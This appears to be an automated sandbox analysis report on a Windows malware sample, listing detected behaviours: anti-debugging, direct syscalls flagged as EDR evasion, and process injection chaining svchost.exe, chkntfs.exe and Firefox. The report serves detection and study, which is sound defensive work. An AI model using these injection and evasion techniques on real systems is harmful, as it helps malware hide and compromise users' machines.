                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]2_2_0326CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]2_2_03304A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]2_2_03230AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]2_2_032B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]2_2_032C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]2_2_032BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]2_2_032BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]2_2_032B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304940 mov eax, dword ptr fs:[00000030h]2_2_03304940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]2_2_032BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]2_2_032C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]2_2_032649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]2_2_032FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]2_2_0326A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]2_2_032BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C810F9 GetUserObjectSecurity,GetLastError,GetProcessHeap,HeapAlloc,GetUserObjectSecurity,0_2_00C810F9
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C52622
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C4083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C4083F
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C40C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C40C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\chkntfs.exeThread register set: target process: 2328Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\chkntfs.exeThread APC queued: target process: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\1162-201.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68E008Jump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C81201
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8B226 SendInput,keybd_event,0_2_00C8B226
                Source: C:\Users\user\Desktop\1162-201.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1162-201.exe"Jump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C80B62
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C81663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C81663
                Source: 1162-201.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: OtAlYRopPg.exe, 00000005.00000000.2503173184.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4620091700.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4620263668.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: 1162-201.exe, OtAlYRopPg.exe, 00000005.00000000.2503173184.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4620091700.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4620263668.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: OtAlYRopPg.exe, 00000005.00000000.2503173184.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4620091700.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4620263668.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: OtAlYRopPg.exe, 00000005.00000000.2503173184.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4620091700.0000000000C21000.00000002.00000001.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4620263668.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C40698 cpuid 0_2_00C40698
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C98195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00C98195
